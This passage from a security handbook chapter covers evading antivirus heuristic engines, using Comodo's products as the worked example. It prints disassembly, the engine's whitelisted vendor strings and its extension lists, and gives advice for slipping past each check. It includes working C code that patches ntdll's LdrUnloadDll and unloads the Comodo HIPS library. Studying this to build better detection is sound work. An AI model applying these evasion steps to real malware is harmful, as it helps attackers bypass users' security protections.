The Antivirus Hacker's Handbook (2015)

Part II. Antivirus Software Evasion

Chapter 9. Evading Heuristic Engines

The heuristic engine is a common antivirus component that detects malicious software without relying on specialized signatures. Heuristic engines make decisions based on general evidence rather than on specifics, unlike generic detections and typical signature-based schemes.

Heuristic engines, as implemented in AV products, rely on detection routines that assess evidence and behavior. They do not rely on specific signatures to try to catch a certain family of malware or malware that shares similar properties. This chapter covers the various types of heuristic engines, which, as you will observe, may be implemented in userland, kernel-land, or both. It is important to learn how to evade heuristic engines because antivirus products today rely more on the behavior of the inspected applications than on the old way of detecting malware using signatures. Learning about the various heuristic engines makes it easier to bypass and evade them. Similarly, AV engineers can gain insight into how attackers evade detection and improve the detection engine accordingly.

Heuristic Engine Types

There are three types of heuristic engines: static, dynamic, and hybrid (which combine both strategies). Most often, static heuristic engines are considered true heuristic engines, while dynamic heuristic engines are called Host Intrusion Prevention Systems (HIPS). Static heuristic engines try to discover malicious software by finding evidence statically, by disassembling or analyzing the headers of the file under scrutiny. Dynamic heuristic engines try to do the same based on the behavior of the file or program, either by hooking API calls or by executing the program under an emulation framework. The following sections cover these different system types and explain how they can be bypassed.

Static Heuristic Engines

Static heuristic engines are implemented in many different ways depending on the deployment target. For example, it is common to use heuristic engines that are based on machine learning algorithms, such as Bayesian networks or genetic algorithms, because they reveal information about similarities between families by focusing on the biggest malware groups created by their clustering toolkits (the heuristic engines). Those heuristic engines are better deployed in malware research labs than in a desktop product, because they can cause a large number of false positives and consume a lot of resources, which is acceptable in a lab environment. For desktop-based antivirus solutions, expert systems are a much better choice.

An expert system is a heuristic engine that implements a set of algorithms that emulate the decision-making strategy of a human analyst. A human malware analyst can determine that a Windows portable executable (PE) program appears malicious, without actually observing its behavior, by briefly analyzing the file structure and taking a quick look at the disassembly of the file. The analyst would be asking the following questions: Is the file structure uncommon? Is it using tricks to fool a human, such as changing the icon of the PE file to the icon that Windows uses for image files? Is the code obfuscated? Is the program compressed or does it seem to be protected somehow? Is it using any anti-debugging tricks? If the answer to such questions is “yes,” then a human analyst would suspect that the file is malicious or at least that it is trying to hide its logic and needs to be analyzed in more depth. Such human-like behavior, when implemented in a heuristic engine, is called an expert system.
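The analyst's questions above can be sketched as a small scoring routine. This is a minimal illustration only: the `Evidence` structure, the weights, and the threshold are hypothetical and are not taken from any antivirus product.

```c
#include <stdbool.h>

/* Hypothetical evidence flags, one per question an analyst might ask. */
typedef struct {
    bool uncommon_structure;   /* unusual file structure */
    bool misleading_icon;      /* executable carrying an image/document icon */
    bool obfuscated_code;
    bool packed_or_protected;
    bool anti_debugging;
} Evidence;

/* Illustrative threshold; the weights below are assumptions as well. */
enum { SUSPICION_THRESHOLD = 50 };

/* Sum the weight of every piece of evidence that is present. */
int suspicion_score(const Evidence *e)
{
    int score = 0;
    if (e->uncommon_structure)  score += 20;
    if (e->misleading_icon)     score += 30;
    if (e->obfuscated_code)     score += 25;
    if (e->packed_or_protected) score += 15;
    if (e->anti_debugging)      score += 25;
    return score;
}

/* Flag the file for deeper analysis once enough evidence accumulates. */
bool is_suspicious(const Evidence *e)
{
    return suspicion_score(e) >= SUSPICION_THRESHOLD;
}
```

A single weak indicator (for example, packing alone) stays below the threshold in this sketch, while several indicators together cross it, which mirrors how an analyst weighs evidence rather than reacting to one property.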

Bypassing a Simplistic Static Heuristic Engine

This section uses the rather simplistic heuristic engine of the Comodo antivirus for Linux as an example. It is implemented in the library libHEUR.so (surprise!). Fortunately, this library comes with full debugging symbol information, so you can discover where the true heuristic engine's code is in this library by simply looking at the function names. Figure 9.1 shows a list of heuristic functions in IDA.

Screenshot of the function window of IDA displaying a list of heuristic functions.

Figure 9.1 The heuristic functions in IDA

This list shows that the C++ class CAEHeurScanner seems to be responsible for performing the heuristic scan. From the following IDA disassembly listing with the VTable of this object, it is clear that the method ScanSingleTarget is the one you are interested in if you want to bypass the heuristic engine:

.data.rel.ro:000000000021A590 ; `vtable for'CAEHeurScanner
.data.rel.ro:000000000021A590 _ZTV14CAEHeurScanner dq 0 ; DATA XREF: .got:_ZTV14CAEHeurScanner_ptr
.data.rel.ro:000000000021A598 dq offset _ZTI14CAEHeurScanner ; `typeinfo for'CAEHeurScanner
.data.rel.ro:000000000021A5A0 dq offset _ZN14CAEHeurScanner14QueryInterfaceER5_GUIDPPv ; CAEHeurScanner::QueryInterface(_GUID &,void **)
.data.rel.ro:000000000021A5A8 dq offset _ZN14CAEHeurScanner6AddRefEv ; CAEHeurScanner::AddRef(void)
.data.rel.ro:000000000021A5B0 dq offset _ZN14CAEHeurScanner7ReleaseEv ; CAEHeurScanner::Release(void)
.data.rel.ro:000000000021A5B8 dq offset _ZN14CAEHeurScannerD1Ev ; CAEHeurScanner::~CAEHeurScanner()
.data.rel.ro:000000000021A5C0 dq offset _ZN14CAEHeurScannerD0Ev ; CAEHeurScanner::~CAEHeurScanner()
.data.rel.ro:000000000021A5C8 dq offset _ZN14CAEHeurScanner4InitEP8IUnknownPv ; CAEHeurScanner::Init(IUnknown *,void *)
.data.rel.ro:000000000021A5D0 dq offset _ZN14CAEHeurScanner6UnInitEPv ; CAEHeurScanner::UnInit(void *)
.data.rel.ro:000000000021A5D8 dq offset _ZN14CAEHeurScanner12GetScannerIDEP10_SCANNERID ; CAEHeurScanner::GetScannerID(_SCANNERID *)
.data.rel.ro:000000000021A5E0 dq offset _ZN14CAEHeurScanner10SetSignMgrEP8IUnknown ; CAEHeurScanner::SetSignMgr(IUnknown
.data.rel.ro:000000000021A5E8 dq offset _ZN14CAEHeurScanner16ScanSingleTargetEP7ITargetP11_SCANOPTIONP11_SCANRESULT ; CAEHeurScanner::ScanSingleTarget(ITarget *,_SCANOPTION *,_SCANRESULT *)
.data.rel.ro:000000000021A5F0 dq offset _ZN14CAEHeurScanner4CureEPvj ; CAEHeurScanner::Cure(void *,uint)

To start analyzing the function, you can navigate to this method in IDA. After a number of rather uninteresting calls to members of objects with unknown types, there is a call to the member ScanMultiPacked:

.text:000000000000E4F9 mov esi, [pstScanOptions+SCANOPTION.eSHeurLevel] ; nLevel
.text:000000000000E4FD mov rcx, pstResult ; pstResult
.text:000000000000E500 mov rdx, piSrcTarget ; piTarget
.text:000000000000E503 mov rdi, this ; this
.text:000000000000E506 call __ZN14CAEHeurScanner15ScanMultiPackedEiP7ITargetP11_SCANRESULT ; CAEHeurScanner::ScanMultiPacked(int,ITarget *,_SCANRESULT *)

The first heuristic routine tries to determine whether the file is packed multiple times. There are a number of instructions after this call, including an interesting call to ScanUnknowPacker (the method name is spelled this way in the binary):

.text:000000000000E516 mov rcx, pstResult ; pstResult
.text:000000000000E519 mov rdx, pstScanOptions ; pstScanOptions
.text:000000000000E51C mov rsi, piSrcTarget ; piSrcTarget
.text:000000000000E51F mov rdi, this ; this
.text:000000000000E522 call __ZN14CAEHeurScanner16ScanUnknowPackerEP7ITargetP11_SCANOPTIONP11_SCANRESULT ; CAEHeurScanner::ScanUnknowPacker(ITarget *,_SCANOPTION *,_SCANRESULT *)

It is obvious that Comodo is trying to gather more evidence, and this time it is trying to see whether the file is packed with some unknown packer. Of course, you need to know whether it is packed, and if so, how. If you continue exploring this heuristic engine, you will come across a number of instructions after this call, including this interesting call to ScanDualExtension:

.text:000000000000E530 mov rcx, pstResult ; pstScanResult
.text:000000000000E533 mov rdx, pstScanOptions ; pstScanOption
.text:000000000000E536 mov rsi, piSrcTarget ; piTarget
.text:000000000000E539 mov rdi, this ; this
.text:000000000000E53C call __ZN14CAEHeurScanner17ScanDualExtensionEP7ITargetP11_SCANOPTIONP11_SCANRESULT ; CAEHeurScanner::ScanDualExtension(ITarget *,_SCANOPTION *,_SCANRESULT *)

The heuristic engine considers a dual extension to be evidence that the file is bad, regardless of how the file itself is implemented. Now you can continue with the remaining calls:

.text:000000000000E557 mov rcx, pstResult ; pstScanResult
.text:000000000000E55A mov rdx, pstScanOptions ; pstScanOption
.text:000000000000E55D mov rsi, piSrcTarget ; piTarget
.text:000000000000E560 mov rdi, this ; this
.text:000000000000E563 call __ZN14CAEHeurScanner13ScanCorruptPEEP7ITargetP11_SCANOPTIONP11_SCANRESULT ; CAEHeurScanner::ScanCorruptPE(ITarget *,_SCANOPTION *,_SCANRESULT *)
(…)
.text:000000000000E584 mov rsi, piSrcTarget ; piTarget
.text:000000000000E587 mov rdi, this ; this
.text:000000000000E58A call __ZN14CAEHeurScanner5IsFPsEP7ITarget ; CAEHeurScanner::IsFPs(ITarget *)
(…)

First, it checks whether the PE file appears to be corrupt by calling the ScanCorruptPE function. Then it issues a call to the function IsFPs, which tries to determine whether the “bad” file is actually a false positive. The function likely checks some sort of list of known false positives. The engine is checking a hard-coded list in the binary instead of having the list in an easy-to-update component, like the antivirus signature files. The IsFPs function is shown here:

.text:000000000000EABC ; PRBool __cdecl CAEHeurScanner::IsFPs(CAEHeurScanner *const this, ITarget *piTarget)
.text:000000000000EABC public _ZN14CAEHeurScanner5IsFPsEP7ITarget
.text:000000000000EABC _ZN14CAEHeurScanner5IsFPsEP7ITarget proc near
.text:000000000000EABC ; DATA XREF: .got.plt:off_21B160 o
.text:000000000000EABC Exit0:
.text:000000000000EABC this = rdi ; CAEHeurScanner *const
.text:000000000000EABC piTarget = rsi ; ITarget *
.text:000000000000EABC sub rsp, 8
.text:000000000000EAC0 call __ZN14CAEHeurScanner18IsWhiteVersionInfoEP7ITarget ; CAEHeurScanner::IsWhiteVersionInfo(ITarget *)
.text:000000000000EAC5 test eax, eax
.text:000000000000EAC7 bRetCode = rax ; PRBool
.text:000000000000EAC7 setnz al
.text:000000000000EACA movzx eax, al
.text:000000000000EACD pop rdx
.text:000000000000EACE retn
.text:000000000000EACE _ZN14CAEHeurScanner5IsFPsEP7ITarget endp

IsFPs simply calls another member, IsWhiteVersionInfo. If you analyze this function's pseudo-code, you uncover a rather interesting algorithm:

(…)
if ( CAEHeurScanner::GetFileVer(v2, piTarget, wszVerInfo, 0x104uLL, v2->m_hVersionDll) )
{
  for ( i = 0; i < g_nWhiteVerInfoCount; ++i )
  {
    if ( !(unsigned int)PR_wcsicmp2(wszVerInfo, g_WhiteVerInfo[(signed __int64)i].szVerInfo) )
      return 1;
  }
(…)

Note

In Windows, version information is stored in the resources directory and has a well-defined structure format. The version information usually includes file version and product version numbers, language, file description, and product name, among other version attributes.

As expected, it is checking the version information extracted from the PE file against a hard-coded list of version information from programs that are known to cause conflicts but are not malicious. The address g_WhiteVerInfo points to a list of fixed-size UTF-32 strings. If you take a look with a hexadecimal editor, you will see something like the following:

000000000021BAEE 00 00 41 00 00 00 6E 00 00 00 64 00 00 00 72 00  ..A...n...d...r.
000000000021BAFE 00 00 65 00 00 00 61 00 00 00 73 00 00 00 20 00  ..e...a...s... .
000000000021BB0E 00 00 48 00 00 00 61 00 00 00 75 00 00 00 73 00  ..H...a...u...s.
000000000021BB1E 00 00 6C 00 00 00 61 00 00 00 64 00 00 00 65 00  ..l...a...d...e.
000000000021BB2E 00 00 6E 00 00 00 00 00 00 00 00 00 00 00 00 00  ..n.............
(…)
000000000021BBEE 00 00 41 00 00 00 72 00 00 00 74 00 00 00 69 00  ..A...r...t...i.
000000000021BBFE 00 00 6E 00 00 00 73 00 00 00 6F 00 00 00 66 00  ..n...s...o...f.
000000000021BC0E 00 00 74 00 00 00 20 00 00 00 53 00 00 00 2E 00  ..t... ...S.....
000000000021BC1E 00 00 41 00 00 00 2E 00 00 00 00 00 00 00 00 00  ..A.............
(…)
000000000021BCEE 00 00 42 00 00 00 6F 00 00 00 62 00 00 00 53 00  ..B...o...b...S.
000000000021BCFE 00 00 6F 00 00 00 66 00 00 00 74 00 00 00 00 00  ..o...f...t.....
(…)

To evade this rather simplistic heuristic engine, you can use one of the white-listed UTF-32-encoded strings, such as “Andreas Hausladen”, “ArtinSoft S.A.”, or “BobSoft”, in the malware's version information.
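When reading a dump like the one above, it helps to decode the entries mechanically. Each character occupies four bytes with the least significant byte first, and the first character starts two bytes into the first dump row. The three entries shown start 0x100 bytes apart, which is consistent with fixed-size records of 64 UTF-32 characters, although the structure definition is not shown in the listing. The following is a minimal sketch of such a decoder; the function name `utf32le_to_ascii` is hypothetical and is not part of the Comodo library.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Decode a NUL-terminated UTF-32LE string into ASCII.
 * Code points outside printable ASCII are written as '?'.
 * Returns the number of characters written, excluding the terminator.
 */
size_t utf32le_to_ascii(const uint8_t *src, size_t src_len,
                        char *dst, size_t dst_len)
{
    size_t n = 0;

    if (dst_len == 0)
        return 0;

    for (size_t i = 0; i + 4 <= src_len && n + 1 < dst_len; i += 4) {
        /* Assemble one little-endian 32-bit code point. */
        uint32_t cp = (uint32_t)src[i]
                    | ((uint32_t)src[i + 1] << 8)
                    | ((uint32_t)src[i + 2] << 16)
                    | ((uint32_t)src[i + 3] << 24);
        if (cp == 0)
            break;                      /* end of string */
        dst[n++] = (cp >= 0x20 && cp < 0x7F) ? (char)cp : '?';
    }
    dst[n] = '\0';
    return n;
}
```

Feeding it the bytes of the last entry, starting at the `42 00 00 00` sequence, yields the string BobSoft.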

Now you can take a look at some of the previous heuristic routines such as ScanDualExtension:

(…)
if ( v22
  && (unsigned int)CAEHeurScanner::IsInExtensionsList(v6, v22, g_LastExtList, 6u)
  && (unsigned int)CAEHeurScanner::IsInExtensionsList(v6, v18, g_SecLastExtList, 0x2Fu) )
{
  CSecKit::DbgStrCpyA(
    &v6->m_cSecKit,
    "/home/ubuntu/cavse_unix/scanners/heur/src/CAEHeurDualExtension.cpp",
    111,
    Scan_result->szMalwareName,
    0x40uLL,
    "Heur.Dual.Extensions");
  Scan_result->bFound = 1;
  result = 0LL;
}
else
{
LABEL_23:
  result = 0x80004005LL;
}
(…)

In the pseudo-code, it is clear that it is checking whether the extensions are in the two lists: g_LastExtList and g_SecLastExtList. If they are, the Scan_result object instance is updated so that its szMalwareName member contains the detection name (Heur.Dual.Extensions) and the bFound member is set to the value 1 (true).

Now you can check both extensions lists:

.data:000000000021B8D0 ; EXTENSION_0 g_LastExtList[6]
.data:000000000021B8D0 g_LastExtList db '.EXE',0,0,0,0,0,0,'.VBS',0,0,0,0,0,0,'.JS',0,0,0,0,0,0,0,'.CMD',0,0,0,0,0,0,'.BAT',0,0,0,0,0,0,'.'
.data:000000000021B8D0 ; DATA XREF: .got:wcsExtList o
.data:000000000021B8D0 db 'SCR',0,0,0,0,0,0
.data:000000000021B90C align 10h
.data:000000000021B910 public g_SecLastExtList
.data:000000000021B910 ; EXTENSION_0 g_SecLastExtList[47]
.data:000000000021B910 g_SecLastExtList db '.ASF',0,0,0,0,0,0,'.AVI',0,0,0,0,0,0,'.BMP',0,0,0,0,0,0,'.CAB',0,0,0,0,0,0,'.CHM',0,0,0,0,0,0,'.'
.data:000000000021B910 ; DATA XREF: .got:g_SecLastExtList_ptr o
.data:000000000021B910 db 'CUR',0,0,0,0,0,0,'.DOC',0,0,0,0,0,0,'.MSG',0,0,0,0,0,0,'.EML',0,0,0,0,0,0,'.FLA',0,0,0,0,0,0,'.'
.data:000000000021B910 db 'FON',0,0,0,0,0,0,'.GIF',0,0,0,0,0,0,'.HLP',0,0,0,0,0,0,'.HTM',0,0,0,0,0,0,'.HTT',0,0,0,0,0,0,'.'
.data:000000000021B910 db 'ICO',0,0,0,0,0,0,'.INF',0,0,0,0,0,0,'.INI',0,0,0,0,0,0,'.LOG',0,0,0,0,0,0,'.MID',0,0,0,0,0,0,'.'
.data:000000000021B910 db 'DOC',0,0,0,0,0,0,'.JPE',0,0,0,0,0,0,'.JFIF',0,0,0,0,0,'.MOV',0,0,0,0,0,0,'.MP3',0,0,0,0,0,0,'.'
.data:000000000021B910 db 'MP4',0,0,0,0,0,0,'.PDF',0,0,0,0,0,0,'.PPT',0,0,0,0,0,0,'.PNG',0,0,0,0,0,0,'.RAR',0,0,0,0,0,0,'.'
.data:000000000021B910 db 'REG',0,0,0,0,0,0,'.RM',0,0,0,0,0,0,0,'.RMF',0,0,0,0,0,0,'.RMVB',0,0,0,0,0,'.JPEG',0,0,0,0,0,'.'
.data:000000000021B910 db 'TIF',0,0,0,0,0,0,'.IMG',0,0,0,0,0,0,'.WMV',0,0,0,0,0,0,'.7Z',0,0,0,0,0,0,0,'.SWF',0,0,0,0,0,0,'.'
.data:000000000021B910 db 'JPG',0,0,0,0,0,0,'.TXT',0,0,0,0,0,0,'.WAV',0,0,0,0,0,0,'.XLS',0,0,0,0,0,0,'.XLT',0,0,0,0,0,0,'.'
.data:000000000021B910 db 'XLV',0,0,0,0,0,0,'.ZIP',0,0,0,0,0,0

As you can see, each extensions list is a set of fixed-size ASCII strings holding typical file extensions. The first list contains typical executable file extensions (.EXE, .CMD, .VBS, and so on), and the second list contains popular document, video, sound, or image file extensions (such as .AVI or .BMP). The two lists are used to see whether the filename has the form some_name.<SecLastExt>.<LastExt>, for example, Invoice.pdf.exe. Dual extensions of that sort, a form of attack based on social engineering principles, are common in malware that tries to fool the user into believing that an executable file is actually a video, picture, document, ZIP file, or other type. To evade this heuristic detection, you can use a single file extension, an executable extension not in the first list (such as .CPL, .HTA, or .PIF), or a second extension not in the second list of non-executable file types (such as .DOCX, which the listing above does not contain). That's all.
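The dual-extension test described above can be sketched in portable C as follows. This is an illustrative reimplementation, not Comodo's code: the function names are hypothetical, the second list is only a subset of the 47 entries in the listing, and the exact, case-insensitive matching used here is an assumption, because the internals of IsInExtensionsList are not shown.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* The first list as shown above, and a subset of the second list. */
static const char *const LAST_EXT[] = {
    ".EXE", ".VBS", ".JS", ".CMD", ".BAT", ".SCR"
};
static const char *const SEC_LAST_EXT[] = {
    ".AVI", ".BMP", ".DOC", ".JPG", ".PDF", ".TXT", ".ZIP"
};

/* Case-insensitive, exact-length comparison of ext[0..len) with entry. */
static bool ext_equals(const char *ext, size_t len, const char *entry)
{
    if (strlen(entry) != len)
        return false;
    for (size_t i = 0; i < len; i++)
        if (toupper((unsigned char)ext[i]) != entry[i])
            return false;
    return true;
}

static bool in_list(const char *ext, size_t len,
                    const char *const *list, size_t count)
{
    for (size_t i = 0; i < count; i++)
        if (ext_equals(ext, len, list[i]))
            return true;
    return false;
}

/* True when name ends in <second-to-last ext><last ext>, e.g. "Invoice.pdf.exe". */
bool has_dual_extension(const char *name)
{
    const char *last = strrchr(name, '.');
    if (last == NULL || last == name)
        return false;

    /* Walk back from the last dot to the previous one, if any. */
    const char *sec = last - 1;
    while (sec > name && *sec != '.')
        sec--;
    if (*sec != '.')
        return false;

    return in_list(last, strlen(last), LAST_EXT,
                   sizeof LAST_EXT / sizeof *LAST_EXT)
        && in_list(sec, (size_t)(last - sec), SEC_LAST_EXT,
                   sizeof SEC_LAST_EXT / sizeof *SEC_LAST_EXT);
}
```

With these lists, `has_dual_extension("Invoice.pdf.exe")` is true, while `"setup.exe"`, `"Invoice.pdf.cpl"`, and `"report.docx.exe"` are not flagged, which matches the three evasion options listed in the text.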

As shown in this section, with minimal research, you can fool and bypass expert systems-based heuristic engines.

Dynamic Heuristic Engines

Dynamic heuristic engines are implemented in the form of hooks (in userland or kernel-land) or based on emulation. The former approach is more reliable, because it involves actually looking at the true runtime behavior, while the latter is more error prone, because it largely depends on the quality of the corresponding CPU emulator engine and the quality of the emulated operating system APIs. Bypassing heuristic engines based on emulators and virtual execution environments is by far the easiest option available, as already discussed in Chapter 8. However, bypassing heuristic engines based on hooks, like the typical Host Intrusion Prevention Systems (HIPS), is not too complex and depends on which layer the API hooks are installed in. There are two options for installing hooks in order to monitor the behavior of a program: userland hooks and kernel-land hooks. Both have their advantages and disadvantages, as discussed in the following sections.

Userland Hooks

Many antivirus products use userland hooks to monitor the execution of running processes. Hooking consists of detouring a number of common APIs, such as CreateFile or CreateProcess in Windows. So, instead of executing the actual code, a monitoring code installed by the antivirus is executed first. Then, depending on a set of rules (either hard-coded or dynamic), the monitoring code blocks, allows, or reports the execution of the API. Such userland API hooks are typically installed using third-party userland hooking libraries. The following list includes the most common hooking libraries:

· madCodeHook—This is a userland-based hooking engine written in Delphi with support for many different runtime environments. This engine is used in Comodo, old versions of McAfee, and Panda antivirus solutions.

· EasyHook—This is an open-source hooking engine that is known for its good performance and completeness. Some antivirus engines are using it.

· Detours—This is a proprietary hooking engine from Microsoft Research. Its source code is available, but you must purchase a license to use it in commercial products. Some antivirus engines are using this hooking engine for implementing their Ring-3-based monitoring systems.

In any case, it is irrelevant which hooking engine is used by the antivirus you are targeting, because all userland-based hooking engines work in a very similar way:

1. They start by injecting a library into the userland processes that are subject to monitoring. Typically, the hooking library is injected into all processes, so it does system-wide monitoring of userland processes.

2. The engines resolve the API functions that the antivirus wants to monitor.

3. They replace the first assembly instructions of the function with a jump to the antivirus code for handling the corresponding API.

4. After the antivirus code hook for the API is executed and finishes its behavior-monitoring task, the hook usually passes the API call back to the original “unhooked” code path.
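Step 3 above can be made concrete by looking at the bytes a hooking engine writes. On 32-bit x86, one common choice is the five-byte JMP rel32 instruction (opcode 0xE9); this is an assumption for illustration, because the text does not say which encoding a given engine uses. The sketch below only computes and parses the instruction bytes in an ordinary buffer; the function names are hypothetical.

```c
#include <stdint.h>

enum { JMP_REL32_SIZE = 5 };

/*
 * Build the 5-byte x86 "JMP rel32" instruction that, when placed at
 * address `from`, transfers control to address `to`. The displacement
 * is relative to the end of the jump instruction.
 */
void encode_jmp_rel32(uint8_t out[JMP_REL32_SIZE], uint32_t from, uint32_t to)
{
    /* Unsigned arithmetic wraps, so backward jumps encode correctly. */
    uint32_t rel = to - (from + JMP_REL32_SIZE);

    out[0] = 0xE9;
    out[1] = (uint8_t)(rel);
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
}

/*
 * Recover the destination of a JMP rel32 located at `from`.
 * Returns 1 and stores the target in *to, or 0 if the bytes are not
 * a JMP rel32.
 */
int decode_jmp_rel32(const uint8_t code[JMP_REL32_SIZE], uint32_t from,
                     uint32_t *to)
{
    if (code[0] != 0xE9)
        return 0;

    uint32_t rel = (uint32_t)code[1]
                 | ((uint32_t)code[2] << 8)
                 | ((uint32_t)code[3] << 16)
                 | ((uint32_t)code[4] << 24);
    *to = from + JMP_REL32_SIZE + rel;
    return 1;
}
```

Decoding the jump found at the start of a hooked function tells you where the monitoring code lives, which is often enough to identify the injected library.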

The antivirus hooking library or libraries can be injected using various techniques. One of the most common techniques in the past (now deprecated and no longer recommended by Microsoft) was to use the registry value AppInit_DLLs. This value contains one or more paths to DLLs that will be injected into all userland Windows processes that import user32.dll, with a few exceptions (such as Csrss.exe). For years, this was the most typical option. It is used by Kaspersky, Panda, and a lot of other antivirus products (as well as by malware).

Another popular code injection technique, although not truly reliable, works like this: execute an antivirus program component at Windows desktop startup, inject code into an explorer.exe process via CreateRemoteThread, and hook the CreateProcessInternal function. The CreateProcessInternal function is called whenever a new process is about to be created. Because this API was hooked, it is programmed to inject the hooking DLL into the memory space of this new program. This technique cannot guarantee that all new processes will be monitored because of the limitation of the CreateRemoteThread API; nonetheless, this approach is still used by various antivirus products.

The last typical approach for injecting a DLL is to do so from kernel-land. An antivirus driver registers a PsSetCreateProcessNotifyRoutineEx callback, and for any new process, it injects, from kernel-land, a DLL with all the userland code.

Because all hooking engines work almost the same regardless of the injection technique used, you can develop universal techniques to bypass any and all userland-based hooking engines. This bypass technique relies on the fact that a hooking engine needs to overwrite the original function prologue with a jump to the antivirus replacement function, and so you can simply reverse these changes and undo the hooks.

To explain this concept clearly, it is important to note that the prologue of most frame-based functions has the same byte code sequence or machine instructions, typically the following:

8BFF mov edi,edi
55 push ebp
8BEC mov ebp,esp

One quick way to undo the hook is to hard-code the byte sequence of the function prologue in your evasion code and then overwrite the function's start with this prologue. This approach may fail if the hooked functions have a different prologue. Here is a better way to undo the API hook:

1. Read the original libraries from disk (that is, the code of kernel32.dll or ntdll.dll).

2. Resolve the hooked functions' addresses in the library. This can be done, for example, using the Microsoft library dbgeng.dll or by manually walking the export table of the DLL to figure out the addresses.

3. Read the initial bytes of these functions.

4. Write the original bytes back into memory. The antivirus may notice the patch. An alternative would be to execute the first instructions read from the file and then jump back to the original code.
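The comparison at the heart of steps 3 and 4 can be sketched with plain byte buffers. The helpers below are hypothetical and assume you have already obtained the first bytes of a function from the on-disk library and from the loaded copy; how those bytes are read is left out.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* mov edi,edi / push ebp / mov ebp,esp */
static const uint8_t STD_PROLOGUE[] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };

/* True when code starts with the common five-byte prologue. */
bool has_standard_prologue(const uint8_t *code, size_t n)
{
    return n >= sizeof STD_PROLOGUE
        && memcmp(code, STD_PROLOGUE, sizeof STD_PROLOGUE) == 0;
}

/* Offset of the first byte where the two copies differ, or n if they match. */
size_t first_modified_byte(const uint8_t *on_disk, const uint8_t *in_memory,
                           size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (on_disk[i] != in_memory[i])
            return i;
    return n;
}

/*
 * Simple heuristic: the loaded copy begins with JMP rel32 (0xE9)
 * although the on-disk copy does not.
 */
bool looks_detoured(const uint8_t *on_disk, const uint8_t *in_memory, size_t n)
{
    return n >= 5 && in_memory[0] == 0xE9 && on_disk[0] != 0xE9;
}
```

One caveat: bytes that hold absolute addresses can legitimately differ between the file and memory once the loader applies relocations, so a byte-for-byte mismatch deeper in the function is not by itself proof of a hook.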

The next section demonstrates an even easier method for bypassing such heuristic engines.

Note

Bypassing userland hooks used by heuristic engines can be even easier than the generic solution just discussed. Userland hooks can be implemented at various levels. For example, you can hook the CreateFileA and CreateFileW functions from kernel32.dll, or you can hook NtOpenFile from ntdll.dll. The lowest userland level is ntdll.dll; however, in many cases, antivirus products hook only the highest-level functions exported by advapi32.dll or kernel32.dll. In such cases, you do not need to patch the memory of the loaded libraries to remove the hooks; you simply need to use the ntdll.dll exported API (also called a native API), and the antivirus hooking engine will be oblivious to your actions.

Bypassing a Userland HIPS

Comodo Internet Security version 8 and earlier had one HIPS and a sandbox. The HIPS was, naturally, a heuristic engine. The sandbox was a kernel-land component but the HIPS was not. The HIPS was completely developed as userland components. It was implemented in the library guard32.dll or guard64.dll (depending on the architecture and the program executed), which was injected in all userland processes. Note that if those DLLs were not ASLR (Address Space Layout Randomization) aware, then they would render the operating system's ASLR ineffective on a system-wide level for all userland components of the machine being “protected.” Once again, I discuss the implications of injecting non-ASLR DLLs in processes. At one point, Comodo was making the mistake of injecting a non-ASLR version of its hooks, as shown in Figure 9.2.


Figure 9.2 The Comodo HIPS engine without ASLR injected into Firefox

The Comodo guard32 and guard64 libraries hook userland functions such as the exported functions kernel32!CreateProcess[A|W], kernel32!CreateFile[A|W], and ntdll!LdrUnloadDll. One quick and easy way to avoid being detected is to disable this HIPS heuristic engine by unloading the hook library (guard32.dll for 32-bit processes and guard64.dll for 64-bit processes) immediately after your evasion code runs.

On my first try, I simply created a utility with the following code:

int unhook(void)
{
  return FreeLibrary(GetModuleHandleA("guard32.dll"));
}

However, it did not work. The function unhook always returned the error 5, “Access denied.” After attaching a debugger to my userland process, I discovered that the function FreeLibrary was hooked by the guard module—not at kernel32 level (FreeLibrary is exported by this library) but rather at ntdll.dll level, by hooking the function LdrUnloadDll. What can you do to unload the HIPS engine from the process? You can simply remove the hook from LdrUnloadDll and then call the previous code, as shown in the following code:

// Requires <windows.h> and <string.h>
HMODULE hlib = GetModuleHandleA("guard32.dll");
if ( hlib != NULL ) // GetModuleHandleA returns NULL when the module is not loaded
{
  void *addr = (void *)GetProcAddress(GetModuleHandleA("ntdll.dll"), "LdrUnloadDll");
  if ( addr != NULL )
  {
    // Bytes hard-coded from the original Windows 7 x32
    // ntdll.dll library
    static const unsigned char patch[] = {
      0x6A, 0x14, 0x68, 0xD8, 0xBC, 0xE9, 0x7D, 0xE8, 0x51, 0xCC,
      0xFE, 0xFF, 0x83, 0x65, 0xE0, 0x00
    };
    DWORD old_prot;
    // sizeof(patch) is 16 here because patch is an array, not a pointer
    if ( VirtualProtect(addr, sizeof(patch), PAGE_EXECUTE_READWRITE, &old_prot) != 0 )
    {
      memcpy(addr, patch, sizeof(patch));
      VirtualProtect(addr, sizeof(patch), old_prot, &old_prot);
    }
    if ( FreeLibrary(hlib) )
      MessageBoxA(0, "Magic done", "MAGIC", 0);
  }
}

To follow this easy example, you just patch back the entry point of the ntdll.dll exported function LdrUnloadDll and then call FreeLibrary with the handle of the guard32.dll library. It is as simple as it sounds. Actually, this technique has been used a number of times to bypass other HIPS; the first time I remember somebody writing about this approach was in Phrack, Volume 0x0b, Issue 0x3e, from 2003/2004, which is available at http://grugq.github.io/docs/phrack-62-05.txt.

As “The Grugq” (one of the original authors of that issue of Phrack) said on Twitter after rediscovering techniques that he used roughly ten years before, “User-land sand boxing cannot work. If you're in the same address space as the malware, malware wins. End of story.” And he is absolutely right.

Kernel-Land Hooks

You saw in the previous section that bypassing userland hooks (which most userland-based heuristic engines are derived from) is an easy task. But what about kernel-land hooks? How are they usually implemented? How can you bypass them? Hooking in kernel-land can be done at almost any layer. An antivirus product may hook process or thread creation at kernel level by registering callbacks to the following functions:

· PsSetCreateProcessNotifyRoutine—Adds or removes an element from the list of routines to be called whenever a process is created or deleted.

· PsSetCreateThreadNotifyRoutine—Registers a driver-supplied callback that is subsequently notified when a new thread is created or deleted.

· PsSetLoadImageNotifyRoutine—Registers a driver-supplied callback that is subsequently notified whenever an image is loaded or mapped into memory.

